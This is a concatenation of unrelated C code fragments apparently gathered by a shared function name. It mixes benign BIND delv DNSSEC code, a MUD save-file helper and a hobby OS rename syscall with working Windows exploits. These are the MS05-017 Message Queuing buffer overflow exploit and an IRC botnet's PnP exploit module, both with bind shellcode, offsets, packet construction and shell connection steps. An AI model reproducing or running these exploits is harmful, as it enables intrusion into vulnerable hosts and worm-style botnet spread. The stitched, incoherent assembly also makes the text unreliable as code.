memset(packet, '\x90', sizeof(packet));
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
bindport = xport;
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (send(sockfd, (char*)packet, 2196, 0) < 0) {
// printf("\n[-] send failed\n");
//_snprintf(buffer, sizeof(buffer), "send failed");
//irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
//exit(0);
return false;
}
// printf("ok\n");
// printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));
// _snprintf(buffer, sizeof(buffer), "Exploiting IP:%s",exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
// recv(sockfd, recvbuf, 4096, 0);
exploit[exinfo.exploit].stats++;
if (ConnectShell2(exinfo))
return true;
return false;
}
string player_save_file(string who){
if( !stringp(who) ) error("Bad argument 1 to save_file().");
who = convert_name(who);
return master()->player_save_file(who);
}
int
main (int argc, char **argv)
{
unsigned char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525";
unsigned char *packet = NULL;
unsigned short bindport;
unsigned long cnt;
struct sockaddr_in addr;
struct hostent *he;
int len, cpkt = 1;
int sockfd;
char recvbuf[4096];
char *buff, *ptr;
#ifdef _WIN32
WSADATA wsa;
#endif
printf("\n (MS05-017) Message Queuing Buffer Overflow Vulnerability\n\n");
printf("\t Copyright (c) 2004-2005 .: houseofdabus :.\n\n\n");
if (argc < 5) {
printf("%s <host> <port> <netbios name> <bind port> [count]\n", argv[0]);
printf("\nMSMQ ports: 2103, 2105, 2107\n");
printf("count - number of packets. for Win2k Server/AdvServer = 6-8\n\n");
exit(0);
}
#ifdef _WIN32
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
if ((he = gethostbyname(argv[1])) == NULL) {
printf("[-] Unable to resolve %s\n", argv[1]);
return 0;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("[-] create socket failed\n");
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons((short)atoi(argv[2]));
addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(addr.sin_zero), '\0', 8);
printf("\n[*] Connecting to %s:%u ... ", argv[1], atoi(argv[2]));
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
printf("\n[-] connect failed!\n");
exit(0);
}
printf("OK\n");
packet = dce_rpc_bind(0, endp, 1, &cnt);
if (send(sockfd, packet, cnt, 0) == -1) {
printf("[-] send failed\n");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if (len <= 0) {
printf("[-] recv failed\n");
exit(0);
}
free(packet);
printf("[*] Attacking...");
buff = (char *) malloc(4172);
memset(buff, NOP, 4172);
ptr = buff;
memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1);
ptr += sizeof(dce_rpc_header1)-1;
// Remote NetBIOS name
convert_name(ptr, argv[3]);
ptr += strlen(argv[3])*2;
memcpy(ptr, tag_private, sizeof(tag_private)-1);
ptr += sizeof(tag_private)-1;
memcpy(buff+1048, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1);
// offsets
ptr = buff;
ptr += 438;
memcpy(ptr, offsets, sizeof(offsets)-1);
ptr += sizeof(offsets)-1;
// shellcode
bindport = (unsigned short)atoi(argv[4]);
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
buff[4170] = '\0';
buff[4171] = '\0';
if (argc == 6) cpkt = atoi(argv[5]);
while (cpkt--) {
printf(".");
if (send(sockfd, buff, 4172, 0) == -1) {
printf("\n[-] send failed\n");
exit(0);
}
}
printf(" OK\n");
return 0;
}
static isc_result_t
setup_dnsseckeys(dns_client_t *client) {
isc_result_t result;
cfg_parser_t *parser = NULL;
const cfg_obj_t *keys = NULL;
const cfg_obj_t *managed_keys = NULL;
cfg_obj_t *bindkeys = NULL;
const char *filename = anchorfile;
if (!root_validation && !dlv_validation)
return (ISC_R_SUCCESS);
if (filename == NULL) {
#ifndef WIN32
filename = NS_SYSCONFDIR "/bind.keys";
#else
static char buf[MAX_PATH];
strlcpy(buf, isc_ntpaths_get(SYS_CONF_DIR), sizeof(buf));
strlcat(buf, "\\bind.keys", sizeof(buf));
filename = buf;
#endif
}
if (trust_anchor == NULL) {
trust_anchor = isc_mem_strdup(mctx, ".");
if (trust_anchor == NULL)
fatal("out of memory");
}
if (trust_anchor != NULL)
CHECK(convert_name(&afn, &anchor_name, trust_anchor));
if (dlv_anchor != NULL)
CHECK(convert_name(&dfn, &dlv_name, dlv_anchor));
CHECK(cfg_parser_create(mctx, dns_lctx, &parser));
if (access(filename, R_OK) != 0) {
if (anchorfile != NULL)
fatal("Unable to read key file '%s'", anchorfile);
} else {
result = cfg_parse_file(parser, filename,
&cfg_type_bindkeys, &bindkeys);
if (result != ISC_R_SUCCESS)
if (anchorfile != NULL)
fatal("Unable to load keys from '%s'",
anchorfile);
}
if (bindkeys == NULL) {
isc_buffer_t b;
isc_buffer_init(&b, anchortext, sizeof(anchortext) - 1);
isc_buffer_add(&b, sizeof(anchortext) - 1);
result = cfg_parse_buffer(parser, &b, &cfg_type_bindkeys,
&bindkeys);
if (result != ISC_R_SUCCESS)
fatal("Unable to parse built-in keys");
}
INSIST(bindkeys != NULL);
cfg_map_get(bindkeys, "trusted-keys", &keys);
cfg_map_get(bindkeys, "managed-keys", &managed_keys);
if (keys != NULL)
CHECK(load_keys(keys, client));
if (managed_keys != NULL)
CHECK(load_keys(managed_keys, client));
result = ISC_R_SUCCESS;
if (trusted_keys == 0)
fatal("No trusted keys were loaded");
if (dlv_validation)
dns_client_setdlv(client, dns_rdataclass_in, dlv_anchor);
cleanup:
if (result != ISC_R_SUCCESS)
delv_log(ISC_LOG_ERROR, "setup_dnsseckeys: %s",
isc_result_totext(result));
return (result);
}
static isc_result_t
key_fromconfig(const cfg_obj_t *key, dns_client_t *client) {
dns_rdata_dnskey_t keystruct;
isc_uint32_t flags, proto, alg;
const char *keystr, *keynamestr;
unsigned char keydata[4096];
isc_buffer_t keydatabuf;
unsigned char rrdata[4096];
isc_buffer_t rrdatabuf;
isc_region_t r;
dns_fixedname_t fkeyname;
dns_name_t *keyname;
isc_result_t result;
isc_boolean_t match_root = ISC_FALSE, match_dlv = ISC_FALSE;
keynamestr = cfg_obj_asstring(cfg_tuple_get(key, "name"));
CHECK(convert_name(&fkeyname, &keyname, keynamestr));
if (!root_validation && !dlv_validation)
return (ISC_R_SUCCESS);
if (anchor_name)
match_root = dns_name_equal(keyname, anchor_name);
if (dlv_name)
match_dlv = dns_name_equal(keyname, dlv_name);
if (!match_root && !match_dlv)
return (ISC_R_SUCCESS);
if ((!root_validation && match_root) || (!dlv_validation && match_dlv))
return (ISC_R_SUCCESS);
if (match_root)
delv_log(ISC_LOG_DEBUG(3), "adding trust anchor %s",
trust_anchor);
if (match_dlv)
delv_log(ISC_LOG_DEBUG(3), "adding DLV trust anchor %s",
dlv_anchor);
flags = cfg_obj_asuint32(cfg_tuple_get(key, "flags"));
proto = cfg_obj_asuint32(cfg_tuple_get(key, "protocol"));
alg = cfg_obj_asuint32(cfg_tuple_get(key, "algorithm"));
keystruct.common.rdclass = dns_rdataclass_in;
keystruct.common.rdtype = dns_rdatatype_dnskey;
/*
* The key data in keystruct is not dynamically allocated.
*/
keystruct.mctx = NULL;
ISC_LINK_INIT(&keystruct.common, link);
if (flags > 0xffff)
CHECK(ISC_R_RANGE);
if (proto > 0xff)
CHECK(ISC_R_RANGE);
if (alg > 0xff)
CHECK(ISC_R_RANGE);
keystruct.flags = (isc_uint16_t)flags;
keystruct.protocol = (isc_uint8_t)proto;
keystruct.algorithm = (isc_uint8_t)alg;
isc_buffer_init(&keydatabuf, keydata, sizeof(keydata));
isc_buffer_init(&rrdatabuf, rrdata, sizeof(rrdata));
keystr = cfg_obj_asstring(cfg_tuple_get(key, "key"));
CHECK(isc_base64_decodestring(keystr, &keydatabuf));
isc_buffer_usedregion(&keydatabuf, &r);
keystruct.datalen = r.length;
keystruct.data = r.base;
CHECK(dns_rdata_fromstruct(NULL,
keystruct.common.rdclass,
keystruct.common.rdtype,
&keystruct, &rrdatabuf));
CHECK(dns_client_addtrustedkey(client, dns_rdataclass_in,
keyname, &rrdatabuf));
trusted_keys++;
cleanup:
if (result == DST_R_NOCRYPTO)
cfg_obj_log(key, lctx, ISC_LOG_ERROR, "no crypto support");
else if (result == DST_R_UNSUPPORTEDALG) {
cfg_obj_log(key, lctx, ISC_LOG_WARNING,
"skipping trusted key '%s': %s",
keynamestr, isc_result_totext(result));
result = ISC_R_SUCCESS;
} else if (result != ISC_R_SUCCESS) {
cfg_obj_log(key, lctx, ISC_LOG_ERROR,
"failed to add trusted key '%s': %s",
keynamestr, isc_result_totext(result));
result = ISC_R_FAILURE;
}
return (result);
}
int
main(int argc, char *argv[]) {
dns_client_t *client = NULL;
isc_result_t result;
dns_fixedname_t qfn;
dns_name_t *query_name, *response_name;
dns_rdataset_t *rdataset;
dns_namelist_t namelist;
unsigned int resopt, clopt;
isc_appctx_t *actx = NULL;
isc_taskmgr_t *taskmgr = NULL;
isc_socketmgr_t *socketmgr = NULL;
isc_timermgr_t *timermgr = NULL;
dns_master_style_t *style = NULL;
#ifndef WIN32
struct sigaction sa;
#endif
progname = argv[0];
preparse_args(argc, argv);
argc--;
argv++;
isc_lib_register();
result = dns_lib_init();
if (result != ISC_R_SUCCESS)
fatal("dns_lib_init failed: %d", result);
result = isc_mem_create(0, 0, &mctx);
if (result != ISC_R_SUCCESS)
fatal("failed to create mctx");
CHECK(isc_appctx_create(mctx, &actx));
CHECK(isc_taskmgr_createinctx(mctx, actx, 1, 0, &taskmgr));
CHECK(isc_socketmgr_createinctx(mctx, actx, &socketmgr));
CHECK(isc_timermgr_createinctx(mctx, actx, &timermgr));
parse_args(argc, argv);
CHECK(setup_style(&style));
setup_logging(stderr);
CHECK(isc_app_ctxstart(actx));
#ifndef WIN32
/* Unblock SIGINT if it's been blocked by isc_app_ctxstart() */
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_DFL;
if (sigfillset(&sa.sa_mask) != 0 || sigaction(SIGINT, &sa, NULL) < 0)
fatal("Couldn't set up signal handler");
#endif
/* Create client */
clopt = DNS_CLIENTCREATEOPT_USECACHE;
result = dns_client_createx2(mctx, actx, taskmgr, socketmgr, timermgr,
clopt, &client, srcaddr4, srcaddr6);
if (result != ISC_R_SUCCESS) {
delv_log(ISC_LOG_ERROR, "dns_client_create: %s",
isc_result_totext(result));
goto cleanup;
}
/* Set the nameserver */
if (server != NULL)
addserver(client);
else
findserver(client);
CHECK(setup_dnsseckeys(client));
/* Construct QNAME */
CHECK(convert_name(&qfn, &query_name, qname));
/* Set up resolution options */
resopt = DNS_CLIENTRESOPT_ALLOWRUN | DNS_CLIENTRESOPT_NOCDFLAG;
if (no_sigs)
resopt |= DNS_CLIENTRESOPT_NODNSSEC;
if (!root_validation && !dlv_validation)
resopt |= DNS_CLIENTRESOPT_NOVALIDATE;
if (cdflag)
resopt &= ~DNS_CLIENTRESOPT_NOCDFLAG;
/* Perform resolution */
ISC_LIST_INIT(namelist);
result = dns_client_resolve(client, query_name, dns_rdataclass_in,
qtype, resopt, &namelist);
if (result != ISC_R_SUCCESS)
delv_log(ISC_LOG_ERROR, "resolution failed: %s",
isc_result_totext(result));
for (response_name = ISC_LIST_HEAD(namelist);
response_name != NULL;
response_name = ISC_LIST_NEXT(response_name, link)) {
for (rdataset = ISC_LIST_HEAD(response_name->list);
rdataset != NULL;
rdataset = ISC_LIST_NEXT(rdataset, link)) {
result = printdata(rdataset, response_name, style);
if (result != ISC_R_SUCCESS)
delv_log(ISC_LOG_ERROR, "print data failed");
}
}
dns_client_freeresanswer(client, &namelist);
cleanup:
if (dlv_anchor != NULL)
isc_mem_free(mctx, dlv_anchor);
if (trust_anchor != NULL)
isc_mem_free(mctx, trust_anchor);
if (anchorfile != NULL)
isc_mem_free(mctx, anchorfile);
if (qname != NULL)
isc_mem_free(mctx, qname);
if (style != NULL)
dns_master_styledestroy(&style, mctx);
if (client != NULL)
dns_client_destroy(&client);
if (taskmgr != NULL)
isc_taskmgr_destroy(&taskmgr);
if (timermgr != NULL)
isc_timermgr_destroy(&timermgr);
if (socketmgr != NULL)
isc_socketmgr_destroy(&socketmgr);
if (actx != NULL)
isc_appctx_destroy(&actx);
if (lctx != NULL)
isc_log_destroy(&lctx);
isc_mem_detach(&mctx);
dns_lib_shutdown();
return (0);
}
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum )
{
SOCKADDR_IN addr;
int len;
int sockfd;
unsigned short smblen;
char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];
IRC* irc=(IRC*)conn;
BOOL success=FALSE;
char* thisTarget;
int pnpbindsize=405;
int TargetOS, Target;
char* tOS="";
WSADATA wsa;
fWSAStartup(MAKEWORD(2,0), &wsa);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE;
thisTarget = exinfo.ip;
TargetOS=FpHost(thisTarget,FP_NP);
if (TargetOS==OS_UNKNOWN)
TargetOS=FpHost(thisTarget,FP_SMB);
if (TargetOS == OS_WINNT){
Target=OS_WINNT;
success=FALSE;
}else if (TargetOS==OS_WINXP){
Target=OS_WINXP;
success=FALSE;
}else if (TargetOS==OS_WIN2K){
Target=OS_WIN2K;
success=TRUE;
}else{
success=FALSE;
}
ZeroMemory(&addr,sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = finet_addr(thisTarget);
addr.sin_port = fhtons((unsigned short)exinfo.port);
if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE;
if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if (len <= 10) return FALSE;
if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp,"\\\\%s\\IPC$",thisTarget);
convert_name((char *)ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
// nop
ptr = packet;
memset(packet, '\x90', sizeof(packet));
// Start prepare header -- dETOX mod --
memcpy(RPC_call + 260, Offsets[OffNum], 4);
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
unsigned short port;
port = fhtons(bindport)^(USHORT)0x9999;
memcpy(&bindshell[176],&port,2);
memcpy(ptr,bindshell,pnpbindsize-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE;
frecv(sockfd, recvbuf, 4096, 0);
if (!exinfo.silent && exinfo.verbose){
switch(Target){
case 1:
tOS="WINNT";
break;
case 2:
tOS="WIN2K";
break;
case 3:
tOS="WINXP";
break;
default:
tOS="UNKNOWN/2K3/LINUX";
break;
}
irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip);
}
// if(success){
Sleep(2000);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
// }
return TRUE;
}
int syscall_rename(const char *a_oldpath, const char *a_newpath)
{
int ohandle, nhandle;
int drive1, drive2;
char dir_path1[512], dir_path2[512];
char name_comp1[13], name_comp2[13], conv_name1[11], conv_name2[11];
char oldpath[512], newpath[512];
struct dir_entry dent1, dent2;
int exist1, exist2;
struct DIR_FILE *dirf;
int len1, len2;
int i,t;
len1 = strlen(a_oldpath);
len2 = strlen(a_newpath);
if (len1 > 512 || len2 > 512) return ELONGPATH;
strcpy(oldpath,a_oldpath);
strcpy(newpath,a_newpath);
if (oldpath[len1-1] == '/' || oldpath[len1-1] == '\\') oldpath[len1-1] = '\0';
if (newpath[len2-1] == '/' || newpath[len2-1] == '\\') newpath[len2-1] = '\0';
parse_path(oldpath, &drive1, dir_path1, name_comp1);
parse_path(newpath, &drive2, dir_path2, name_comp2);
if (drive1 != drive2) return EDEVICE_DIFFERENT;
nhandle = open_path(drive2, dir_path2);
if (nhandle < 0) return nhandle;
if (name_comp2[0] !='\0')
{
if (convert_name(name_comp2, conv_name2) < 0)
{
close_dir(nhandle);
return EINVALIDNAME; // Error
}
exist2 = find_entry(nhandle, conv_name2, &dent2);
}
ohandle = open_path(drive1, dir_path1);
if (ohandle < 0)
{
close_dir(nhandle);
return ohandle;
}
if (name_comp1[0] != '\0')
{
if (convert_name(name_comp1, conv_name1) < 0)
{
close_dir(nhandle);
close_dir(ohandle);
return EINVALIDNAME; // Error
}
exist1 = find_entry(ohandle, conv_name1, &dent1);
}
// Check whether new path exists and is removable
if ((exist2 == 1) && ((dent2.attrib & FTYPE_READONLY) || ((dent2.attrib & FTYPE_DIR) && (empty_dir(nhandle, &dent2) != 1))))
{
close_dir(nhandle);
close_dir(ohandle);
return ETARGET_EXISTS;
}
// Check if source exists and is movable
if (exist1 != 1)
{
close_dir(nhandle);
close_dir(ohandle);
return EPATH_NOT_EXISTS;
}
if ((dent1.attrib & FTYPE_READONLY) != 0)
{
close_dir(nhandle);
close_dir(ohandle);
return EREADONLY;
}
// Check whether oldpath is not a subpath of newpath
if ((dent1.attrib & FTYPE_DIR) && (ohandle != nhandle))
{
t = nhandle;
dirf = &dir_file_list[t];
while (dirf->parent_index >= 0 && dirf->parent_index != ohandle)
{
t = dirf->parent_index;
dirf = &dir_file_list[t];
}
if (dirf->parent_index == ohandle)
{
close_dir(nhandle);
close_dir(ohandle);
return EOLDPATH_PARENT_OF_NEWPATH;
}
}
// Check if newpath already exists whether it is compatible or not
if ((exist2 == 1) && (((dent1.attrib & FTYPE_DIR) != 0 && (dent2.attrib & FTYPE_DIR) == 0) || ((dent1.attrib & FTYPE_DIR) == 0 && (dent2.attrib & FTYPE_DIR) != 0)))
{
close_dir(nhandle);
close_dir(ohandle);
return ESRC_DEST_NOT_SAME_TYPE;
}
// Remove destination entry if exists
if (exist2 == 1)
{
if (dent2.attrib & FTYPE_DIR)
syscall_rmdir(newpath);
else syscall_unlink(newpath);
}
// Add the source dir entry after changing the name
// to destination directory
bcopy( (char *)&dent1, (char *)&dent2, sizeof(struct dir_entry));
for (i=0; i<11; i++) // Both name and extension
dent2.name[i] = conv_name2[i];
t = add_dir_entry(nhandle, &dent2);
if (t == 1)
{
delete_dir_entry(ohandle, dent1.name);
}
// Close the handles of parent directories
close_dir(ohandle);
close_dir(nhandle);
if (t == 1) return 0;
else return t;
}
